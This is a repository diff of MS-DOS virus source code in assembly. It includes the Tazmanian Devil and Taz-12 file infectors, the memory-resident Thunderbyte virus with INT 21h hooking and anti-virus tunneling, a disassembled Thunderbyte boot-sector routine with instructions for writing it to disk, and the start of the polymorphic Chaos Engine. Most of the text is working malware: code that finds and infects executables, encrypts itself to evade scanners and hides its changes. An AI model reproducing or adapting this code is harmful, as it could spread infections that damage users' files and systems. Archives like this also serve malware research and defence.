virus_msg18 db cr,lf,"ADH ÜÜÛÛÛÜÜ ADH ßÛÛÛÛÜH ADH ADßßßßßßßDH ÜÛÛÛÛÛÛÛADH ADH ADH ADH ADH ADH$"
virus_msg19 db cr,lf,"ADÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜADH ADH ADH AÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜDH ADH ADH ADH$"
virus_msg20 db cr,lf,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ ADH ADH ADH$"
virus_msg21 db cr,lf,"AÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßßADH ADH ADH ADHßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ ADH ADH ADH$"
virus_msg22 db cr,lf,"ADßß ßÛÛÛÛÛßßßßßßDH ADH ADH ADH ADH ADH ADßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ ADH ADH ADH$"
virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,2 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
mov dx,offset virus_msg23
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

252
MSDOS/Virus.MSDOS.Unknown.taz12.asm Normal file
View File

@ -0,0 +1,252 @@
cseg segment byte public 'code'
assume cs:cseg, ds:cseg
org 100h
start_of_virus:
call get_offset
get_offset: ;alternative way to get the delta
mov di,sp ;offset without activating any flags in
mov bp,word ptr ss:[di] ;TB-scan
sub bp,offset get_offset
inc sp
inc sp
push ds ;save es & ds
push es
push cs ;and point ds to code segment
pop ds
call encrypt_decrypt ;decrypt contents of file
start_of_encryption:
cld ;clear direction flag
mov ah,1ah ;set new dta area
lea dx,[bp+dta_area]
int 21h
mov bx,es
push cs ;es points to code segment
pop es
lea si,[bp+return2_buffer] ;this code prepares the return code
lea di,[bp+return_buffer]
movsw ;transfer buffer contents
lodsw
add ax,bx ;bx holds start es = psp
add ax,10h
stosw
; lea di,[bp+stack_return]
; lea si,[bp+stack_save] ;si already points to stack_save
add di,8 ;saving a byte with this code
lodsw ;prepares the restore of ss/sp
add ax,bx
add ax,10h
stosw
movsw
mov ah,47h ;save starting directory
xor dl,dl
lea si,[bp+save_dir]
int 21h
find_new_files: ;start finding files
mov ah,4eh
mov cx,7
lea dx,[bp+search_pattern]
find_files:
int 21h
jnc open_file ;if found a file
lea dx,[bp+dir_mask] ;else change directory
mov ah,3bh
int 21h
jnc find_new_files
jmp no_more_files ;end of all files
open_file: ;open the found file
mov ax,3d02h
lea dx,[bp+dta_area+1eh]
int 21h
xchg ax,bx ;file handle in bx
mov ah,3fh ;read the exe header to exe_header
mov cx,18h
lea dx,[bp+exe_header]
int 21h
lea si,[bp+exe_header] ;check if it's really a executable
lodsw
cmp ax,'ZM'
je check_infected
cmp ax,'MZ'
je check_infected
jmp no_exe ;else jump
check_infected:
add si,10h ;saving another byte
; lea si,[bp+exe_header+12h]
lodsw
cmp ax,'Ri' ;is it already infected?
jne start_infect
jmp already_infected
start_infect:
lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer
movsw
movsw
lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save
movsw
movsw
lea di,[bp+exe_header+12h] ;mark the file infected
mov ax,'Ri'
stosw
mov al,2 ;go to end_of_file
call go_eof ;dx/ax is file length at return
mov cx,10h ;use div to save bytes instead of speed
div cx
sub ax,word ptr ds:[bp+exe_header+8]
xchg dx,ax
stosw ;put new ip/cs in exe_header
xchg dx,ax
stosw
inc ax ;put new suitable ss/sp in exe_header
inc ax
mov word ptr [bp+exe_header+0eh],ax
mov word ptr [bp+exe_header+10h],4b0h
mov ah,2ch ;get system time for random number
int 21h
xor dh,dh ;just alter the code a little bit
or dl,00001010b ;with encryption so TB-scan wont't
mov word ptr [bp+encryption_value],dx ;find garbage instruction
mov ah,40h ;prepare to append virus to file
lea dx,[bp+start_of_virus]
call append_virus ;call it
mov al,2 ;go to end of file
call go_eof
mov cx,512 ;get filesize in 512 modules
div cx
inc ax
mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in
mov word ptr [bp+exe_header+4],ax ;exe header
xor al,al ;go to beginning of file
call go_eof
mov ah,40h ;write new exe header
mov cx,18h
lea dx,[bp+exe_header]
int 21h
lea si,[bp+dta_area+16h] ;restore time/date stamp
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
already_infected:
no_exe:
mov ah,3eh ;close file
int 21h
mov ax,4301h ;restore file attribute
mov cl,byte ptr [bp+dta_area+15h]
lea dx,[bp+dta_area+1eh]
int 21h
mov ah,4fh ;find next file
jmp find_files
no_more_files:
lea dx,[bp+save_dir] ;restore starting directory
mov ah,3bh
int 21h
pop es ;shrink memory block
mov ah,4ah
mov bx,10000
int 21h
push es
mov ah,48h ;allocate a new 3k block
mov bx,192
int 21h
jc no_mem
dec ax
mov es,ax
mov word ptr es:[1],0008h ;mark DOS as owner and it will
no_mem: ;reduce available memory to DOS
pop es ;restore old es/ds
pop ds
cli ;must use this before altering ss/sp
mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp
mov sp,word ptr cs:[bp+stack_return+2]
sti ;interrupts allowed again
end_part:
db 0eah ;jmp to original ip
return_buffer db 0,0,0,0
return2_buffer dw 0,0fff0h ;code for carrier file to exit
stack_save dd ?
stack_return dd ?
dir_mask db '..',0
search_pattern db '*.exe',0
signature db "Taz-12 (C) 94 by Sector Infector!"
go_eof: ;procedure to go to beginning and
mov ah,42h ;end of file
xor cx,cx ;this saves a few bytes as it's
cwd ;used a few times
int 21h
ret
end_of_encryption:
pad db 0 ;pad out a byte so first byte of
;encryption value won't be overwritten
encryption_value dw 0
encrypt_decrypt: ;cryptation routine
mov si,word ptr [bp+encryption_value]
lea di,[bp+start_of_encryption]
mov cx,(end_of_encryption-start_of_encryption+1)/2
crypt_loop:
xor word ptr [di],si
inc di
inc di
loop crypt_loop
ret
append_virus:
call encrypt_decrypt ;encrypt virus before write
mov cx,end_of_virus-start_of_virus ;cx is length of virus
int 21h ;call 40h
call encrypt_decrypt ;decrypt virus again
ret
end_of_virus:
exe_header db 18h dup(?) ;don't need to copy this shit
dta_area db 43 dup(?) ;to the next file to infect
save_dir db 64 dup(?) ;return adress is already saved!
cseg ends
end start_of_virus

171
MSDOS/Virus.MSDOS.Unknown.tboot.asm Normal file
View File

@ -0,0 +1,171 @@
;This is a disassembly of Thunderbyte's anti-viral partition code.
;An org statement was not used because it appears that all offsets used
;herein are either relative or absolute, i.e. it just doesn't matter.
;This should be compiled as a binary image file, it *WILL NOT* create
;an executable file. This code is exactly 512 bytes long and should be
;implanted into the hard drive at physical sector 1, cylinder 0, head 0
;using the BIOS direct write to disk function. *DO NOT* use DOS write to
;disk functions or DEBUG because these functions can't access hidden sectors
;and you'll probably just overwrite the disk drive.
;have fun, folks!
code_start:
cli ;no interrupts
xor cx, cx
mov ss, cx
mov sp, 7c00h
mov si, sp
sti
cld
mov es, cx ;cs already equals 0
mov ds, cx
mov di, 0600h ;
mov ch, 01 ;cx = 100h
repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h
;to make room for boot sector
jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label
;i.e. 0000:061ah, wraps around segment
first_pt: ;when execution continues, this will be offset
;061ah here
mov si, 06ddh
call routine_1
mov si, 07eeh
call routine_2
mov bp, si
mov si, 0733h
jb second_pt
mov bx, sp ;buffer at stack pointer (7c00h?)
mov ax, 0201h ;func 2, 1 sector - possibily boot sector?
int 13h ;BIOS read sector
mov si, 0725h
second_pt:
jb sixth_pt
mov si, 745h
call routine_1
call routine_1
mov si, 7c40h
mov cx, 01c0h
loop_1:
xchg ax, bx
shl bx, 1
lodsb ;from 0000:7c40h
add ax, bx
mov ah, bh
test ah, ah
jns third_pt
xor ax, 0a097h
third_pt:
loop loop_1
cmp ax, 7805h
jnz fourth_pt
mov si, 0740h
call routine_1
mov si, 0762h
call 01cdh
mov dx, [si + 0fc9fh]
cmp dx, 27eh
jb fourth_pt
mov si, 740h
call routine_1
mov si, 774h
call routine_1
les ax, [004c]
mov bx, es
mov cl, 04
shr ax, cl
add ax, bx
inc cx
inc cx
shl dx, cl
cmp ax, dx
jnb fifth_pt
fourth_pt:
mov si, 0787h
call routine_1
int 16h
mov si, 783h
or al, 20h
cmp al, 79h
jnz seventh_pt
fifth_pt:
call routine_1
mov si, bp
mov dx, [si]
jmp sp ;control goes to boot sector
sixth_pt:
call routine_1
int 16h
seventh_pt:
int 18h ;rom BASIC!
eighth_pt:
jmp eighth_pt ;infinite loop Lock Up!
routine_2:
lea di, [si - 30h]
boot_chk:
cmp byte ptr [si], 80h ;looks like check for bootable parttn
jz bootable
sub si, 10h
cmp si, di
jnb boot_chk
ret
bootable:
mov dx, [si]
mov cx, [si + 2]
return_pt:
ret
routine_1:
lodsb
cbw ;convert to word
test ax, ax ;huh?
jz return_pt ;like ret to original caller
mov ah, 0eh
xor bx, bx
push si
int 10h
pop si
jmp routine_1
code_end:
msg1 db 13, 10, "Thunderbyte anti-virus partition "
db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0
msg2 db "Disk error!", 13, 10, 00
msg3 db "No system!", 13, 10, 00
msg4 db "OK!", 13, 10,"Checking ",0
msg5 db "bootsector CRC -> ",0
msg6 db "available RAM -> ",0
msg7 db "INT 13h -> ",0
msg8 db "OK!",13, 10, 10, 0
msg9 db "Failed!", 13, 10, "System might be infected. Continue? (N/Y)", 07, 0
misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h
db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0
db 10h dup(0)
db 10h dup(0)
db 0eh dup(0)
id_sig db 55h, 0aah

612
MSDOS/Virus.MSDOS.Unknown.tbyte.asm Normal file
View File

@ -0,0 +1,612 @@
;*****************************************************************************;
; ;
; Tunderbyte Virus ;
; ;
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
; ;
;*****************************************************************************;
virus segment public 'code'
assume cs:virus, ds:virus, es:virus
org 0
VirusStart equ $
VirusSize1 equ (VirusEnd1-$)
VirusSize2 equ (VirusEnd2-$)
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
db 80h,76h,Decrypt2-VirusStart-1,0
db 4dh,75h,-7
Decrypt2: cli
mov sp,offset DoAgain-2
ret -8
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dl,byte ptr cs:Decrypt1[6]
mov dh,dl
mov si,offset StartEncrypt
NotReady: ret 2
DecryptWord: mov ax,ss:[si]
xor cs:[si],dx
NextWord: add dx,ax
inc si
ret -4
dw DecryptWord
dw DoAgain
dw NextWord
dw Init
DoAgain: loop NotReady
StartEncrypt equ $
Main: mov sp,1000h
sti
push ds
push es
mov ax,03031h
mov bx,0DEADh
int 21h
cmp ax,0DEADh
jne Install
jmp Exit
Install: push es
mov ah,52h
int 21h
mov ax,es:[bx-2]
mov cs:FirstMCB,ax
pop es
CheckBlock: mov ds,ax
inc ax
cmp word ptr ds:[1],ax
jne NextBlock
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
jne NextBlock
push ax
push es
mov cx,VirusSize2
xor di,di
mov es,ax
mov al,es:[di]
cld
repe scasb
pop es
pop ax
je CopyVirus
NextBlock: add ax,ds:[3]
cmp byte ptr ds:[0],'Z'
jne CheckBlock
mov ah,4ah
mov bx,-1
int 21h
mov ah,4ah
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
int 21h
mov ah,48h
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
int 21h
CopyVirus: push cs
pop ds
dec ax
mov es,ax
inc ax
mov es:[1],ax
mov cx,8
mov si,offset CommandStr
mov di,cx
cld
rep movsb
mov es,ax
EncryptZero: inc byte ptr ds:Decrypt1[6]
jz EncryptZero
mov cx,VirusSize2
xor si,si
xor di,di
cld
rep movsb
push es
call ReturnFar
xor ax,ax
mov ds,ax
cli
mov ax,offset DebugWatch
xchg ax,ds:[20h]
mov cs:OldInt8o,ax
mov ax,cs
xchg ax,ds:[22h]
mov cs:OldInt8s,ax
sti
push ds:[4]
push ds:[6]
mov word ptr ds:[4],offset Trace1
mov word ptr ds:[6],cs
pushf
push cs
mov ax,offset Return4
push ax
cli
pushf
pop ax
or ax,100h
push ax
push ds:[86h]
push ds:[84h]
mov ah,52h
Trace1: push bp
mov bp,sp
push ax
push ds
push cs
pop ds
mov ax,FirstMCB
cmp [bp+4],ax
jae Return1
mov ax,[bp-2]
mov RegAX,ax
mov RegSP,bp
mov ax,[bp+2]
mov OldInt21o,ax
mov ax,[bp+4]
mov OldInt21s,ax
xor ax,ax
mov ds,ax
mov word ptr ds:[4],offset Trace2
mov word ptr ds:[6],cs
jmp short Trace3
Return1: jmp short Return3
Trace2: push bp
mov bp,sp
push ax
push ds
cmp ax,cs:RegAX
jne Return3
cmp bp,cs:RegSP
jne Return3
Trace3: push bx
push dx
lds bx,[bp+2]
mov al,[bx]
mov dx,[bx+1]
inc dx
cmp al,0e9h
je JumpOpcode
cmp al,0e8h
je CallOpcode
xchg ax,dx
dec ax
cbw
xchg ax,dx
cmp al,0ebh
je JumpOpcode
cmp al,70h
jb Return2
cmp al,7fh
ja Return2
JumpOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackJump
mov word ptr ds:[0cah],cs
jmp short Continue
CallOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackCall
mov word ptr ds:[0cah],cs
Continue: pop ds
pop ax
mov cs:Displacement,dx
mov cs:Opcode,al
mov ax,32cdh
xchg ax,[bx]
mov cs:SavedCode,ax
mov cs:HackOffset,bx
mov cs:HackSegment,ds
and word ptr [bp+6],0feffh
Return2: pop dx
pop bx
Return3: pop ds
pop ax
pop bp
iret
Return4: pop ds:[6]
pop ds:[4]
mov cs:Handle,0
Exit: pop es
pop ds
mov ax,ds
add ax,10h
add cs:OldCS,ax
add ax,cs:OldSP
mov dx,cs:OldSP
cli
mov ss,ax
mov sp,dx
sti
jmp cs:OldEntry
ReturnFar: retf
OldEntry equ this dword
OldIP dw 0
OldCS dw -10h
OldSP dw 1000h
OldSS dw 0
HackAddress equ this dword
HackOffset dw ?
HackSegment dw ?
SavedCode dw ?
HackJump: call Interrupt21
push bp ; simulate a conditional or
push ax ; unconditional jump
mov bp,sp
mov ax,[bp+8]
and ax,0fcffh
push ax
db 0b8h ; mov ax,????
Displacement dw 0
popf
Opcode db 0ebh,3,0 ; j?? +3
xor ax,ax
nop
add [bp+4],ax
pop ax
pop bp
iret
HackCall: call Interrupt21
sub sp,2 ; simulate a call
push bp
mov bp,sp
push ax
mov ax,[bp+4]
inc ax
xchg ax,[bp+8]
xchg ax,[bp+6]
xchg ax,[bp+4]
add ax,cs:Displacement
mov [bp+2],ax
pop ax
pop bp
iret
Seek: mov ah,42h
xor cx,cx
xor dx,dx
Dos: pushf
db 9ah
OldInt21o dw ?
OldInt21s dw ?
ret
DosVersion: cmp ax,3031h
jne NotTByte
cmp bx,0DEADh
jne NotTByte
mov ax,0DEADh
add sp,8
iret
Interrupt21: cmp ah,30h
je DosVersion
push si
push ds
push cs:SavedCode
lds si,cs:HackAddress
pop ds:[si]
pop ds
pop si
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3eh
je CloseFile
cmp ah,40h
je WriteFile
Old21: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
push si
push ds
lds si,cs:HackAddress
mov word ptr ds:[si],32cdh
pop ds
pop si
NotTByte: ret
WriteFile: mov ax,4400h
call Dos
cmp dl,7fh
ja Error1
mov al,1
call Seek
jc Error1
or dx,dx
jnz Error1
cmp ax,17h
ja Error1
push cs
pop es
mov si,dx
mov di,offset Signature
add di,ax
cmp word ptr [si],"ZM"
jne Error1
cmp word ptr [si+12h],0DEADh
je Error1
cmp cx,18h
jb CheckHandle
or ax,ax
jz Ok
CheckHandle: cmp bx,cs:Handle
jne Error1
Ok: add cx,ax
cmp cx,18h
jbe CountOk
mov cx,18h
CountOk: sub cx,ax
jbe Error1
cld
rep movsb
mov cs:Handle,bx
Error1: jmp Old21
CloseFile: push cs
pop ds
push cs
pop es
mov ax,4400h
call Dos
test dl,80h
jne Error1
or bx,bx
je Read
cmp cs:Handle,bx
je DoNotRead
Read: xor al,al
call Seek
jc Error1
mov ah,3fh
mov cx,18h
mov dx,offset Signature
call Dos
jc Error1
DoNotRead: mov cs:Handle,0
cmp Signature,"ZM"
jne Error1
cmp ChkSum,0DEADh
je Error1
mov ax,ExeIP
mov OldIP,ax
mov ax,ExeCS
mov OldCS,ax
mov ax,ExeSS
mov OldSS,ax
mov ax,ExeSP
mov OldSP,ax
mov al,2
call Seek
jc Error1
push ax
push dx
mov cx,200h
div cx
cmp PartPage,dx
jne SizeError
add dx,-1
adc ax,0
cmp PageCount,ax
SizeError: pop dx
pop ax
jne Error2
add ax,0fh
adc dx,0
and ax,0fff0h
mov cx,dx
mov dx,ax
mov ax,4200h
call Dos
jnc SeekOk
Error2: jmp Old21
SeekOk: mov cx,10h
div cx
sub ax,HdrSize
mov ExeCS,ax
mov ExeIP,offset Decrypt1
mov ExeSS,ax
mov ExeSP,VirusSize1+400h
cmp MinMem,40h
jae MemoryOk
mov MinMem,40h
cmp MaxMem,40h
jae MemoryOk
mov MaxMem,40h
MemoryOk: push ds
push es
mov ax,cs
mov ds,ax
add ax,(VirusSize2+0fh)/10h
mov es,ax
mov cx,VirusSize1
xor si,si
xor di,di
cld
rep movsb
mov ds,ax
mov cx,offset StartEncrypt-Decrypt2
mov dl,byte ptr ds:Decrypt1[6]
mov si,offset StartEncrypt-1
Again1: xor ds:[si],dl
dec si
loop Again1
mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dh,dl
mov si,offset StartEncrypt
Again2: xor ds:[si],dx
mov ax,ds:[si]
add dx,ax
inc si
add dx,ax
inc si
loop Again2
mov ah,40h
mov cx,VirusSize1
xor dx,dx
call Dos
pop ds
pop es
jc Error3
mov al,2
call Seek
jc Error3
mov cx,200h
div cx
mov PartPage,dx
add dx,-1
adc ax,0
mov PageCount,ax
mov ChkSum,0DEADh
xor al,al
call Seek
jc Error3
mov ah,40h
mov cx,18h
mov dx,offset Signature
call Dos
Error3: jmp Old21
Count dw 8
DebugStr db 'DEBUG'
CommandStr db 'COMMAND '
DebugWatch: push ax
push cx
push dx
push si
push di
push ds
push es
dec cs:Count
jnz EndWatch
mov cs:Count,8
mov ax,0b000h
mov ds,ax
mov cx,2
push cs
pop es
cld
NextScreen: push cx
mov cx,2000
xor si,si
mov di,offset DebugStr
NextChar1: mov dx,5
NextChar2: lodsb
inc si
and al,0dfh
scasb
jne CharOk
dec dx
jnz NextChar2
Alarm: pop cx
lds si,cs:HackAddress
cmp byte ptr ds:[si],0cdh
jne EndWatch
mov ax,cs:SavedCode
mov ds:[si],ax
xor cx,cx
mov ds,cx
mov ax,cs:OldInt8o
mov ds:[20h],ax
mov ax,cs:OldInt8s
mov ds:[22h],ax
mov es,cx
push cs
pop ds
mov cx,14
mov si,offset EndWatch-2
mov di,4f0h
push es
push di
rep movsb
xor di,di
mov cx,VirusSize2
push cs
pop es
retf
CharOk: neg dx
add dx,5
sbb di,dx
sub si,dx
sub si,dx
loop NextChar1
ScreenOk: mov ax,ds
add ax,800h
mov ds,ax
pop cx
loop NextScreen
jmp short EndWatch
rep stosb
EndWatch: pop es
pop ds
pop di
pop si
pop dx
pop cx
pop ax
db 0eah
OldInt8o dw ?
OldInt8s dw ?
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
VirusEnd1 equ $
FirstMCB dw ?
RegAX dw ?
RegSP dw ?
Handle dw ?
Signature dw ?
PartPage dw ?
PageCount dw ?
ReloCnt dw ?
HdrSize dw ?
MinMem dw ?
MaxMem dw ?
ExeSS dw ?
ExeSP dw ?
ChkSum dw ?
ExeIP dw ?
ExeCS dw ?
VirusEnd2 equ $
virus ends
end Main

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

862
MSDOS/Virus.MSDOS.Unknown.tce.asm Normal file
View File

@ -0,0 +1,862 @@
radix 16
;*****************************************
;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 *
;*****************************************
;1995 - Sepultura - Australia
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;on CALLing of TCE -
;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH.
;;; 2 - Make Short Decryptor (No Junk).
;;; 4 - Add Segment Overide.
;;;
;;;CX = Length of Code to Encrypt.
;;;DX = Delta Offset.
;;;DS:SI = Code to encrypt (DS _MUST_ = CS).
;;;ES:DI = Location of Buffer to Create Decryptor in.
;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;ON RETURN:
;;;ES = DS = Segment of Decryptor / Encrypted Code
;;;DX = Pointer to Start of Code
;;;CX = Length of Code
;;;;;;;;;;;;;;;;;;;
;;;Flag EQUates
MAKE_SMALL equ 1
PAD_TO_MAX equ 2
ADD_SEG equ 4
;;;;;;;;;;;;;;;;;;;
;;;W.H.A.T.E.V.E.R
DECRYPTOR_LENGTH equ 190h
MAX_PADDING equ 90h - 1f
length_1 equ (offset int_tbl - offset one_byters)-1
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;REGISTER TABLE - INTEL STANDLE FORMAT
tce_AX equ 0000xB
tce_CX equ 0001xB
tce_DX equ 0010xB
tce_BX equ 0011xB
tce_SP equ 0100xB
tce_BP equ 0101xB
tce_SI equ 0110xB
tce_DI equ 0111xB
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;THe BeLoW InSTuCTiOn CaN KilL A MaN
db '[TCE-0.4]',0
;*****************************************************
;*****************************************************
;*** The REAL _REAL_ START of THE CHAOS ENGINE 0.4 ***
;*****************************************************
;*****************************************************
tce: push ax,bx,bp
push di,si
cld
mov tce_begin,di
mov tce_delta,dx
mov c_length,cx
mov tce_flags,ax
call clear_regs
mov B index_sub,0
mov B[offset more_junk],0b0
test W tce_flags,MAKE_SMALL
if nz mov B[offset more_junk],0c3
push si
call get_rand_1f
add ax,MAX_PADDING
xchg cx,ax
call more_junk
swap0: mov si,offset init_1
lodsw
call binary
jz no_swap1
xchg ax,[si]
mov [si-2],ax
no_swap1:
push ax
lodsw
call binary
jnz no_swap2
xchg ax,[si]
mov [si-2],ax
no_swap2:
push ax
lodsw
lodsw
call binary
jz build_code
xchg ax,[si]
mov [si-2],ax
build_code:
pop ax
call ax
call pad_10
pop ax
call ax
call pad_10
call W init_3
call pad_10
call gen_decrypt
call pad_8
call W init_4
call pad_8
call W init_5
call pad_10
call gen_loop
call pad_8
test W tce_flags,PAD_TO_MAX
jz no_padding
mov B[offset more_junk],0b0
mov cx,DECRYPTOR_LENGTH
add cx,tce_begin
sub cx,di
call more_junk
no_padding:
mov ax,di
sub ax,DECRYPTOR_LENGTH
add enc_index,ax
mov bx,W index_loc
cmp B index_sub,1
if e neg ax
add es:[bx],ax
pop si
mov cx,c_length
rep movsb
mov dx,tce_begin
mov ds,es
call encryptor
mov cx,di
sub cx,dx
pop si,di
pop bp,bx,ax
ret
